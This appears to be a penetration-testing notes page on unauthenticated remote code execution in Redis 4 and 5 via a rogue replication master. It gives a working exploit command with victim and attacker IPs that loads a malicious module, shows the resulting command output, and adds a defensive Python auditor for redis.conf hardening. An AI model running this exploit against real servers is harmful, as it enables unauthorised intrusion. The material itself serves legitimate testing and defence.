Redis 4 and 5 Unauthenticated RCE

rce, foothold

Overview

You can deploy a rogue Redis server and use Redis's replication capabilities to execute arbitrary commands on the target server.

::NOTE::

Looks like this is for Linux only.

Steps

# 10.10.70.254 - victim ip
# 10.11.40.33 - attacker ip
python3 redis-master.py -r 10.10.70.254 -p 6379 -L 10.11.40.33 -P 8888 -f RedisModulesSDK/exp.so -c "id"
...truncated...


# Clients
connected_clients:1
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:0

uid=112(redis) gid=123(redis) groups=123(redis)

Notes
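
Because the technique relies on an unauthenticated client driving replication, the server-side settings that matter are authentication, network exposure, and whether the replication and module commands are reachable. The Python check below is an added example, not code from the original page or from the tool's author; it audits redis.conf text for those settings. The sample configs, finding labels and function names are constructed, and the hardened sample assumes Redis 5, since REPLICAOF does not exist in Redis 4.

```python
# Added example: audit redis.conf text for settings that leave the replication
# and module-load path open to unauthenticated clients. Sample configs are constructed.
# A command renamed to "" is disabled. REPLICAOF exists from Redis 5 onward.
RISKY_COMMANDS = ("SLAVEOF", "REPLICAOF", "MODULE", "CONFIG")

def parse_conf(text):
    """Return (directives, renamed_commands) parsed from redis.conf text."""
    directives, renamed = {}, {}
    for raw in text.splitlines():
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue
        key, args = parts[0].lower(), [a.strip('"') for a in parts[1:]]
        if key == "rename-command" and len(args) == 2:
            renamed[args[0].upper()] = args[1]
        else:
            directives[key] = args
    return directives, renamed

def audit(text, commands=RISKY_COMMANDS):
    """Return sorted findings; an empty list means every check passed."""
    d, renamed = parse_conf(text)
    findings = []
    if not (d.get("requirepass") or [""])[0]:
        findings.append("no-requirepass")
    if (d.get("protected-mode") or ["yes"])[0].lower() != "yes":  # default is yes
        findings.append("protected-mode-off")
    binds = d.get("bind", [])  # no bind directive means all interfaces
    if not binds or any(b not in ("127.0.0.1", "::1") for b in binds):
        findings.append("non-loopback-bind")
    findings += ["exposed-command:" + c for c in commands if c not in renamed]
    return sorted(findings)

WEAK_CONF = """
bind 0.0.0.0
protected-mode no
"""

HARDENED_CONF = """
bind 127.0.0.1
protected-mode yes
requirepass "constructed-long-random-secret"
rename-command SLAVEOF ""
rename-command REPLICAOF ""
rename-command MODULE ""
rename-command CONFIG ""
"""

if __name__ == "__main__":
    print("weak:    ", audit(WEAK_CONF))
    print("hardened:", audit(HARDENED_CONF))
```

On Redis 4, pass `commands=("SLAVEOF", "MODULE", "CONFIG")` and drop the REPLICAOF line from the config, because renaming a command that does not exist stops the server from starting.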

References